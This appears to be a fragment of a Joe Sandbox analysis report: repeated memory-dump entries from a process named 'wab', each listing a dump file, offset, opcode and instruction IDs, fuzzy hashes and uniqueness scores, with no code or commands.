                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c94eee814779b90853c281ce51cff6ab94ed2aea3adf75a15305fbb375476fa
                                                                                    • Instruction ID: 01536890ad19fc1c08b21eb846843879be68cb1e6631a969983d9a9eb3d7caa9
                                                                                    • Opcode Fuzzy Hash: 5c94eee814779b90853c281ce51cff6ab94ed2aea3adf75a15305fbb375476fa
                                                                                    • Instruction Fuzzy Hash: 7A617F30F002199FEB159FA9C8547AEBBF7FB88310F20852AE509AB395DB754C458F94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a960c99200694756585fe7c1c178fb16a799ea6bedf242e2309a7f2b3f36a76
                                                                                    • Instruction ID: 06143fd1585a619288764afbd7ae3d846a93c0abfe76dd70904f54521bc1a977
                                                                                    • Opcode Fuzzy Hash: 3a960c99200694756585fe7c1c178fb16a799ea6bedf242e2309a7f2b3f36a76
                                                                                    • Instruction Fuzzy Hash: D951BF32E0011ADFDB15EF78E49869DB7B3FB84315F108869E10AD7251DB358955CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7e83a8fc7f6446f306e0a1b26889d43fe219417057a7f08912753b84d59dbc6
                                                                                    • Instruction ID: 274f2ee819baabb3bcffe295188f787f3d058ca69c93c655a5e7b2bb2acdbf25
                                                                                    • Opcode Fuzzy Hash: d7e83a8fc7f6446f306e0a1b26889d43fe219417057a7f08912753b84d59dbc6
                                                                                    • Instruction Fuzzy Hash: 1C51C631B001568BFB265ABCC85475E7A6BD7C9310F20482AED0BD7397CD79CD458BA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 052d83875fa5290cad38c84d344b2a61bc8ea9766482037221b307e35f0222b1
                                                                                    • Instruction ID: bd1e123a7c5df0cb4e380e181854fc66408abcfbc9b1a8e901d01b360e187463
                                                                                    • Opcode Fuzzy Hash: 052d83875fa5290cad38c84d344b2a61bc8ea9766482037221b307e35f0222b1
                                                                                    • Instruction Fuzzy Hash: B651A231B001668BEB265ABCC85475E7A5BE7C9310F20482AED0BD7397CD79CD418BA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d18a4ca04c2c018aa73924d216b6025f05c2bd479847173715b2003dad67d7bc
                                                                                    • Instruction ID: eef892c950346a8777e522dc1393163dbd50b31daca65a66c003b32cb86a8372
                                                                                    • Opcode Fuzzy Hash: d18a4ca04c2c018aa73924d216b6025f05c2bd479847173715b2003dad67d7bc
                                                                                    • Instruction Fuzzy Hash: 18517031F002599FDB05DFA9C454BAEBBB7FB88710F208529D549AB395DA748C018B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 396457b990854f87b8fd43b87b5673842b7b6dc689380b935b767045656d5c98
                                                                                    • Instruction ID: 5bdbb79dd7c687048166e5074cb8d41c773d7e57be1e2449d235e218919537db
                                                                                    • Opcode Fuzzy Hash: 396457b990854f87b8fd43b87b5673842b7b6dc689380b935b767045656d5c98
                                                                                    • Instruction Fuzzy Hash: 39415071E0061A9FDB21CE9DD8C0AAFFBF3FB84310F10892AE216D7651D630E9458B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1572e305152934eb09707c946910d46e206e052ddc15c2bbe60d8b4eb2767841
                                                                                    • Instruction ID: 15a58648230969c818fb8415b708d916e806a18afb8a2ae8ee087e088950a29d
                                                                                    • Opcode Fuzzy Hash: 1572e305152934eb09707c946910d46e206e052ddc15c2bbe60d8b4eb2767841
                                                                                    • Instruction Fuzzy Hash: C6418F70E0026ADFDB15DF69C85469EBBB3FF85704F208929D505EB240DF749946CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a705ef8ca16736ea6e681ea73dc50a540bb1cfbc3877342335e694ba4c57249
                                                                                    • Instruction ID: 832349b073d1360fb12912a2555ccda8fc2310144deb43f9f65154fe8fcb5b35
                                                                                    • Opcode Fuzzy Hash: 3a705ef8ca16736ea6e681ea73dc50a540bb1cfbc3877342335e694ba4c57249
                                                                                    • Instruction Fuzzy Hash: C031F032F00156CFDB0AAF78D4582AEB7B3EB85211F108979D04AEB345DF358916CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 918d24b0e73fccdf0619127a67fae5094a902fb193e4045e18d5f73654b06566
                                                                                    • Instruction ID: a1cf77ec03fbc952a2e77a56afc91bf3ebf1d39d7df44f194585c68bc3f50efd
                                                                                    • Opcode Fuzzy Hash: 918d24b0e73fccdf0619127a67fae5094a902fb193e4045e18d5f73654b06566
                                                                                    • Instruction Fuzzy Hash: 27417C70E0026A9FDB15DF69D48069EBBB3FF85300F108929D905EB240EF74A956CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9aad5611040c5ec497ff0eca1f2f28bd8c6a88ab98f3ecc149c1cf132edaff1
                                                                                    • Instruction ID: 5c1d6327457043ff47c174f1f06038c725a4e83d620a59d5c20bacc732f81849
                                                                                    • Opcode Fuzzy Hash: d9aad5611040c5ec497ff0eca1f2f28bd8c6a88ab98f3ecc149c1cf132edaff1
                                                                                    • Instruction Fuzzy Hash: DE31E530B402228FDB099F79C4546AE7BA3AF89724F20496DC406DF399DE39DD42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8e462e2b7596bb375e2996a6b26d51e95dc3d7c0fc90975a81227ecfd7c8c3d
                                                                                    • Instruction ID: 49ce59e006ca37ecb060831ef4a374ba983731176a027e52732dcfdbec01789d
                                                                                    • Opcode Fuzzy Hash: e8e462e2b7596bb375e2996a6b26d51e95dc3d7c0fc90975a81227ecfd7c8c3d
                                                                                    • Instruction Fuzzy Hash: 1A31B030B002268FDB09AF79C45466F7BA7AFC9714F204968C406DF399DE35DD428B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51ba981dfc7f51318eab2dc2a5e370c4d74b09aa7607027824b6b20f4ace0357
                                                                                    • Instruction ID: 8cd723a33b36bcc38478381023a15163de0b32c523daabd91a323804ab7a95fa
                                                                                    • Opcode Fuzzy Hash: 51ba981dfc7f51318eab2dc2a5e370c4d74b09aa7607027824b6b20f4ace0357
                                                                                    • Instruction Fuzzy Hash: 2F315430A1461A9BDB15DF69C48068EBBB7FF85300F108929E805EB345DFB4E946CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d19b9f74008d32d9448d5f10ece9a21da71c4dd9883fa44d7e53132bb538e74f
                                                                                    • Instruction ID: 7fdfe25cf7a3badb0709c157bf6648010b3e90d637af66be9cc711ae97a1ee38
                                                                                    • Opcode Fuzzy Hash: d19b9f74008d32d9448d5f10ece9a21da71c4dd9883fa44d7e53132bb538e74f
                                                                                    • Instruction Fuzzy Hash: 8E315230A1461A8BDB15DF69C48068EBBB7FF84300F108929D905EB345EFB4E946CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e1dbb83213f46da2907d38c8bea81a873195dda1a58303fa8cb24983ef11c7b6
                                                                                    • Instruction ID: 43906efc2a6a82929b29eb8bd9207b8737b9e69572f1ad18e00e7e72e31cb3b2
                                                                                    • Opcode Fuzzy Hash: e1dbb83213f46da2907d38c8bea81a873195dda1a58303fa8cb24983ef11c7b6
                                                                                    • Instruction Fuzzy Hash: 312151B1F522199FDB00CFB9E841AEDBBF2EB48710F104466E909EB395E774D9058B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 849aa8efaa0547bae6a3f99b0c94cff6f113ecf7499dfe198ff6f77bba18f3ec
                                                                                    • Instruction ID: efca0f128fe34367282cc723b2e9a2dd643543484f09eaf6b0deaa4ee660e1e5
                                                                                    • Opcode Fuzzy Hash: 849aa8efaa0547bae6a3f99b0c94cff6f113ecf7499dfe198ff6f77bba18f3ec
                                                                                    • Instruction Fuzzy Hash: 15214F75F0121A9FDB00CF69D890AEEBBF2AB48710F10446AE909E7390E774DD408B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3593420237.000000000279D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0279D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_279d000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f737f0f00a62ca7feb269012a5df5687131c87f6536780a005b969ec9db5a45
                                                                                    • Instruction ID: e330824a9d2fdd0603303f00ea675b983490abb841207d3a4ba3f7a07637c21d
                                                                                    • Opcode Fuzzy Hash: 8f737f0f00a62ca7feb269012a5df5687131c87f6536780a005b969ec9db5a45
                                                                                    • Instruction Fuzzy Hash: 4831497550D3C49FCB13DB24D994711BF71AF47214F2985DBD8888F2A3C27A984ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3593420237.000000000279D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0279D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_279d000_wab.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
